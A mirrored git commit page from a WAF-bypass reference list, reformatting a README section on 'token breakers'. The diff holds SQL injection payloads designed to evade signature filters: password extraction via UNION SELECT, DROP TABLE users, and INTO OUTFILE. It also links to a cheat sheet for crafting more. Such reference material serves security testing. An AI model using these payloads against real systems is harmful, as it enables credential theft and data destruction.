mirror of
https://github.com/0xInfection/Awesome-WAF.git
synced 2024-12-22 23:23:28 +07:00
Added stuff follow up update
This commit is contained in:
parent
b4afef22b6
commit
179eda145d
10
README.md
10
README.md
@ -2475,12 +2475,12 @@ __13. Token Breakers__
|
||||
- Token breakers are symbols that allow affecting the correspondence between an element of a string and a certain token, and thus bypass search by signature.
|
||||
- However, the request must still remain valid while using token-breakers.
|
||||
|
||||
__Case__: Unknown Token for the Tokenizer
|
||||
__Payload__: `?id=‘-sqlite_version() UNION SELECT password FROM users --`
|
||||
- __Case__: Unknown Token for the Tokenizer
|
||||
- __Payload__: `?id=‘-sqlite_version() UNION SELECT password FROM users --`
|
||||
|
||||
__Case__: Unknown Context for the Parser (Notice the uncontexted bracket)
|
||||
__Payload 1__: `?id=123);DROP TABLE users --`
|
||||
__Payload 2__: `?id=1337) INTO OUTFILE ‘xxx’ --`
|
||||
- __Case__: Unknown Context for the Parser (Notice the uncontexted bracket)
|
||||
- __Payload 1__: `?id=123);DROP TABLE users --`
|
||||
- __Payload 2__: `?id=1337) INTO OUTFILE ‘xxx’ --`
|
||||
|
||||
> __TIP:__ More payloads can be crafted via this [cheat sheet](https://github.com/attackercan/cpp-sql-fuzzer).
|
||||
|
||||
|
Loading…
Reference in New Issue
Block a user